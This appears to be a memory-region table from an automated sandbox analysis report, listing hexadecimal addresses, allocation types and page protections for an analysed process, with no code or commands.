20458F00000
heap
page read and write
A4F0000
direct allocation
page read and write
284A0000
trusted library allocation
page read and write
28470000
trusted library allocation
page read and write
284E0000
trusted library allocation
page read and write
32D0000
trusted library allocation
page read and write
25F00000
trusted library allocation
page read and write
28460000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
284E0000
trusted library allocation
page read and write
2045B68E000
trusted library allocation
page read and write
E3C000
stack
page read and write
2045CBFE000
trusted library allocation
page read and write
862E000
stack
page read and write
28350000
heap
page read and write
20472FAE000
heap
page read and write
28E9C000
stack
page read and write
28251000
heap
page read and write
2599F000
stack
page read and write
25A5D000
stack
page read and write
28040000
trusted library allocation
page read and write
25DF0000
trusted library allocation
page read and write
20458F70000
heap
page read and write
25A1D000
stack
page read and write
2045CC1F000
trusted library allocation
page read and write
72A0000
direct allocation
page read and write
28460000
trusted library allocation
page read and write
8794000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
2045AE07000
heap
page execute and read and write
8B2D000
stack
page read and write
2045AEDD000
trusted library allocation
page read and write
DC36000
direct allocation
page execute and read and write
28470000
trusted library allocation
page read and write
A49E000
stack
page read and write
7FFD9BA40000
trusted library allocation
page read and write
3340000
heap
page read and write
2045A8E0000
heap
page readonly
3155000
heap
page read and write
28460000
trusted library allocation
page read and write
25F10000
heap
page execute and read and write
2047321F000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
20473060000
heap
page read and write
7FFD9B78D000
trusted library allocation
page execute and read and write
7FFD9B9E0000
trusted library allocation
page read and write
A6C0000
heap
page read and write
9FE6000
remote allocation
page execute and read and write
3310000
trusted library allocation
page read and write
25A9C000
stack
page read and write
2817D000
stack
page read and write
B436000
direct allocation
page execute and read and write
284B0000
trusted library allocation
page read and write
7F380000
trusted library allocation
page execute and read and write
334B000
heap
page read and write
4B80000
heap
page readonly
3196000
heap
page read and write
284E0000
trusted library allocation
page read and write
28460000
trusted library allocation
page read and write
32B8000
heap
page read and write
25F00000
trusted library allocation
page read and write
7B40000
trusted library allocation
page read and write
323D000
trusted library allocation
page execute and read and write
204590BF000
heap
page read and write
A5CE000
heap
page read and write
7AC0000
heap
page read and write
28470000
trusted library allocation
page read and write
2FF0000
heap
page read and write
2045B6C5000
trusted library allocation
page read and write
4500000
remote allocation
page execute and read and write
7FFD9BAC0000
trusted library allocation
page read and write
69263FD000
stack
page read and write
284B0000
trusted library allocation
page read and write
7B10000
trusted library allocation
page read and write
7FFD9BA90000
trusted library allocation
page read and write
7AF0000
trusted library allocation
page read and write
7FFD9B840000
trusted library allocation
page execute and read and write
28470000
trusted library allocation
page read and write
A45E000
stack
page read and write
284E0000
trusted library allocation
page read and write
25F67000
trusted library allocation
page read and write
712E000
stack
page read and write
5C01000
trusted library allocation
page read and write
A57F000
heap
page read and write
2E80000
heap
page read and write
7A90000
trusted library allocation
page read and write
25DF9000
trusted library allocation
page read and write
72B0000
direct allocation
page read and write
25DF0000
trusted library allocation
page read and write
20458F40000
heap
page read and write
20473243000
heap
page read and write
28029000
stack
page read and write
3240000
trusted library allocation
page read and write
6926275000
stack
page read and write
3300000
trusted library allocation
page read and write
45E6000
remote allocation
page execute and read and write
7B60000
trusted library allocation
page read and write
25AD0000
trusted library allocation
page read and write
AA36000
direct allocation
page execute and read and write
2835B000
heap
page read and write
2045CC11000
trusted library allocation
page read and write
199A8260000
heap
page read and write
7FFD9B920000
trusted library allocation
page read and write
692657E000
stack
page read and write
25DF0000
trusted library allocation
page read and write
28351000
heap
page read and write
20473233000
heap
page read and write
5C19000
trusted library allocation
page read and write
8BE6000
remote allocation
page execute and read and write
77D0000
heap
page read and write
8750000
heap
page read and write
2045907A000
heap
page read and write
A5D2000
heap
page read and write
28450000
trusted library allocation
page read and write
25DF0000
trusted library allocation
page read and write
3290000
heap
page read and write
28040000
trusted library allocation
page read and write
2045A8F0000
trusted library allocation
page read and write
86C5000
trusted library allocation
page read and write
6DE6000
remote allocation
page execute and read and write
540E000
trusted library allocation
page read and write
28226000
trusted library allocation
page read and write
A310000
heap
page read and write
284E0000
trusted library allocation
page read and write
2045CC50000
trusted library allocation
page read and write
7270000
direct allocation
page read and write
E78000
stack
page read and write
28470000
trusted library allocation
page read and write
204731AA000
heap
page read and write
25DF0000
trusted library allocation
page read and write
28460000
trusted library allocation
page read and write
284E0000
trusted library allocation
page read and write
28030000
trusted library allocation
page read and write
30CC000
heap
page read and write
25DF0000
trusted library allocation
page read and write
2046AE5F000
trusted library allocation
page read and write
A64E000
stack
page read and write
7AE0000
trusted library allocation
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
20472FA9000
heap
page read and write
A690000
direct allocation
page read and write
63E6000
remote allocation
page execute and read and write
326B000
trusted library allocation
page execute and read and write
3000000
heap
page read and write
28458000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
69268B8000
stack
page read and write
20458EE0000
heap
page read and write
8C20000
direct allocation
page read and write
7950000
trusted library allocation
page read and write
26F31000
trusted library allocation
page read and write
8630000
heap
page read and write
204731E3000
heap
page read and write
2045B2C8000
trusted library allocation
page read and write
20459096000
heap
page read and write
53BF000
trusted library allocation
page read and write
20473266000
heap
page read and write
28470000
trusted library allocation
page read and write
26F59000
trusted library allocation
page read and write
259DE000
stack
page read and write
3220000
trusted library allocation
page read and write
4BF1000
trusted library allocation
page read and write
20472F60000
heap
page read and write
20472FF9000
heap
page read and write
284C0000
trusted library allocation
page read and write
9550000
direct allocation
page execute and read and write
25DF0000
trusted library allocation
page read and write
28250000
heap
page read and write
77E9000
heap
page read and write
4BE0000
heap
page read and write
3158000
heap
page read and write
7FFD9B830000
trusted library allocation
page read and write
8B30000
trusted library allocation
page read and write
7FFD9BA80000
trusted library allocation
page read and write
28221000
trusted library allocation
page read and write
28050000
heap
page read and write
28450000
trusted library allocation
page read and write
28373000
heap
page read and write
3234000
trusted library allocation
page read and write
30B0000
trusted library section
page read and write
2045B347000
trusted library allocation
page read and write
204590C4000
heap
page read and write
75FE000
stack
page read and write
2045B50B000
trusted library allocation
page read and write
32B0000
heap
page read and write
29A0000
heap
page read and write
324D000
trusted library allocation
page execute and read and write
A6C7000
heap
page read and write
2E0E000
stack
page read and write
28470000
trusted library allocation
page read and write
8C50000
direct allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
692667C000
stack
page read and write
2046B14E000
trusted library allocation
page read and write
F036000
direct allocation
page execute and read and write
7FFD9B9C0000
trusted library allocation
page read and write
2047317C000
heap
page read and write
53FB000
trusted library allocation
page read and write
692647E000
stack
page read and write
28040000
trusted library allocation
page read and write
7FFD9B93A000
trusted library allocation
page read and write
3250000
trusted library allocation
page read and write
2045CC23000
trusted library allocation
page read and write
E636000
direct allocation
page execute and read and write
A604000
heap
page read and write
763E000
stack
page read and write
3256000
trusted library allocation
page execute and read and write
6773CFD000
stack
page read and write
7B80000
trusted library allocation
page read and write
7A8D000
stack
page read and write
8798000
heap
page read and write
7FFD9BA10000
trusted library allocation
page read and write
28460000
trusted library allocation
page read and write
7900000
trusted library allocation
page read and write
2045907C000
heap
page read and write
8640000
trusted library allocation
page execute and read and write
6926B3B000
stack
page read and write
7FFD9BA70000
trusted library allocation
page read and write
32B0000
heap
page read and write
5C5D000
trusted library allocation
page read and write
A660000
direct allocation
page read and write
A500000
direct allocation
page read and write
A417000
heap
page read and write
3260000
trusted library allocation
page read and write
E7D000
stack
page read and write
8570000
trusted library allocation
page read and write
2595E000
stack
page read and write
A585000
heap
page read and write
2045B6D1000
trusted library allocation
page read and write
8720000
trusted library allocation
page read and write
304E000
stack
page read and write
284E0000
trusted library allocation
page read and write
25DF0000
trusted library allocation
page read and write
5348000
trusted library allocation
page read and write
32F0000
trusted library allocation
page read and write
25FF2000
trusted library allocation
page read and write
25F00000
trusted library allocation
page read and write
7FFD9B931000
trusted library allocation
page read and write
A5C0000
heap
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
A4E0000
heap
page readonly
26F95000
trusted library allocation
page read and write
C836000
direct allocation
page execute and read and write
284A0000
trusted library allocation
page read and write
2045B684000
trusted library allocation
page read and write
284E0000
trusted library allocation
page read and write
733A000
stack
page read and write
25F00000
trusted library allocation
page read and write
A5E8000
heap
page read and write
28035000
trusted library allocation
page read and write
2045ADE0000
heap
page execute and read and write
2045CDA3000
trusted library allocation
page read and write
2045B6B0000
trusted library allocation
page read and write
A3F0000
heap
page read and write
2046B13F000
trusted library allocation
page read and write
28470000
trusted library allocation
page read and write
2045CE91000
trusted library allocation
page read and write
7960000
heap
page execute and read and write
7FFD9B790000
trusted library allocation
page read and write
32E4000
trusted library allocation
page read and write
2822D000
trusted library allocation
page read and write
20458FD0000
heap
page read and write
2045B6E8000
trusted library allocation
page read and write
723B000
stack
page read and write
28200000
trusted library allocation
page read and write
2045A8D0000
trusted library allocation
page read and write
7FFD9B836000
trusted library allocation
page read and write
4BC0000
trusted library allocation
page read and write
199A83B0000
heap
page read and write
199A84B5000
heap
page read and write
7831000
heap
page read and write
25DE0000
trusted library allocation
page read and write
7B50000
trusted library allocation
page execute and read and write
2045CCA3000
trusted library allocation
page read and write
2045AE00000
heap
page execute and read and write
8580000
trusted library allocation
page read and write
538A000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
2045B2E4000
trusted library allocation
page read and write
6773DFF000
unkown
page read and write
5BF1000
trusted library allocation
page read and write
A670000
direct allocation
page read and write
8788000
heap
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
25DF0000
trusted library allocation
page read and write
30C0000
heap
page read and write
28470000
trusted library allocation
page read and write
27FEA000
stack
page read and write
7160000
heap
page execute and read and write
25EF0000
trusted library allocation
page read and write
28353000
heap
page read and write
28040000
trusted library allocation
page read and write
69269BE000
stack
page read and write
28212000
trusted library allocation
page read and write
25DF0000
trusted library allocation
page read and write
7FFD9B83C000
trusted library allocation
page execute and read and write
25C8E000
stack
page read and write
2FF0000
heap
page read and write
2FFB000
heap
page read and write
2045B690000
trusted library allocation
page read and write
25DF5000
trusted library allocation
page read and write
A5C4000
heap
page read and write
3330000
trusted library allocation
page read and write
28470000
heap
page read and write
2045B672000
trusted library allocation
page read and write
2820E000
trusted library allocation
page read and write
A5E8000
heap
page read and write
5362000
trusted library allocation
page read and write
792A000
trusted library allocation
page read and write
8770000
heap
page read and write
2821A000
trusted library allocation
page read and write
20473009000
heap
page read and write
28363000
heap
page read and write
2047323C000
heap
page read and write
2F60000
heap
page read and write
28351000
heap
page read and write
27FAE000
stack
page read and write
2045AA05000
heap
page read and write
7B70000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
30FF000
heap
page read and write
25B1E000
stack
page read and write
4BB0000
trusted library allocation
page execute and read and write
25DF0000
trusted library allocation
page read and write
25900000
heap
page read and write
284E0000
trusted library allocation
page read and write
53D9000
trusted library allocation
page read and write
28470000
trusted library allocation
page read and write
28037000
trusted library allocation
page read and write
7340000
heap
page read and write
2045905C000
heap
page read and write
2876D000
stack
page read and write
A4DD000
stack
page read and write
A518000
heap
page read and write
9636000
direct allocation
page execute and read and write
2045B07D000
trusted library allocation
page read and write
5397000
trusted library allocation
page read and write
4D4B000
trusted library allocation
page read and write
25DF0000
trusted library allocation
page read and write
28470000
trusted library allocation
page read and write
3312000
trusted library allocation
page read and write
7FFD9B866000
trusted library allocation
page execute and read and write
8BD0000
trusted library allocation
page read and write
784A000
heap
page read and write
20473257000
heap
page read and write
25BAD000
stack
page read and write
535C000
trusted library allocation
page read and write
25DF0000
trusted library allocation
page read and write
4B7F000
stack
page read and write
2FEE000
stack
page read and write
A584000
heap
page read and write
28E1C000
stack
page read and write
281F9000
stack
page read and write
2045CC8D000
trusted library allocation
page read and write
281BC000
stack
page read and write
32E0000
trusted library allocation
page read and write
6926A3C000
stack
page read and write
25BEE000
stack
page read and write
692758E000
stack
page read and write
77E6000
remote allocation
page execute and read and write
25C50000
remote allocation
page read and write
6773EFF000
stack
page read and write
3315000
trusted library allocation
page execute and read and write
8C10000
direct allocation
page read and write
28470000
trusted library allocation
page read and write
29F0000
heap
page read and write
2045AE51000
trusted library allocation
page read and write
59E6000
remote allocation
page execute and read and write
69267B6000
stack
page read and write
2045C713000
trusted library allocation
page read and write
330A000
trusted library allocation
page execute and read and write
69262BF000
stack
page read and write
25D00000
direct allocation
page read and write
7260000
direct allocation
page read and write
199A84B4000
heap
page read and write
3243000
trusted library allocation
page read and write
72FD000
stack
page read and write
7240000
direct allocation
page read and write
287AE000
stack
page read and write
A510000
heap
page read and write
2045B34B000
trusted library allocation
page read and write
7290000
direct allocation
page read and write
8C40000
direct allocation
page read and write
7FFD9B8A0000
trusted library allocation
page execute and read and write
20472FB7000
heap
page read and write
25C50000
remote allocation
page read and write
27F6C000
stack
page read and write
A6A0000
direct allocation
page read and write
2045CC92000
trusted library allocation
page read and write
BE36000
direct allocation
page execute and read and write
8740000
heap
page read and write
28460000
trusted library allocation
page execute and read and write
7FFD9B9D0000
trusted library allocation
page read and write
702E000
stack
page read and write
25E4E000
stack
page read and write
199A8240000
heap
page read and write
20458FDD000
heap
page read and write
692750F000
stack
page read and write
2045CBFA000
trusted library allocation
page read and write
28367000
heap
page read and write
2045B2D1000
trusted library allocation
page read and write
25CCF000
stack
page read and write
7FFD9B79B000
trusted library allocation
page read and write
25DF0000
trusted library allocation
page read and write
6926ABE000
stack
page read and write
284C0000
trusted library allocation
page read and write
25DF0000
trusted library allocation
page read and write
79CE000
stack
page read and write
28470000
trusted library allocation
page read and write
25D10000
direct allocation
page read and write
7FFD9B782000
trusted library allocation
page read and write
32E3000
trusted library allocation
page execute and read and write
A608000
heap
page read and write
77FA000
heap
page read and write
692768A000
stack
page read and write
30F3000
heap
page read and write
28470000
trusted library allocation
page read and write
7920000
trusted library allocation
page read and write
70AF000
stack
page read and write
204590BD000
heap
page read and write
28F80000
trusted library allocation
page read and write
7DF4CF160000
trusted library allocation
page execute and read and write
8A6E000
stack
page read and write
25D5B000
stack
page read and write
7907000
trusted library allocation
page read and write
28EDE000
stack
page read and write
8BE0000
trusted library allocation
page execute and read and write
28356000
heap
page read and write
2045AE40000
heap
page execute and read and write
199A8160000
heap
page read and write
28F70000
trusted library allocation
page read and write
28470000
trusted library allocation
page read and write
204592A5000
heap
page read and write
199A84B0000
heap
page read and write
8650000
trusted library allocation
page read and write
25F00000
trusted library allocation
page read and write
3233000
trusted library allocation
page execute and read and write
5401000
trusted library allocation
page read and write
There are 614 hidden memdumps, click here to show them.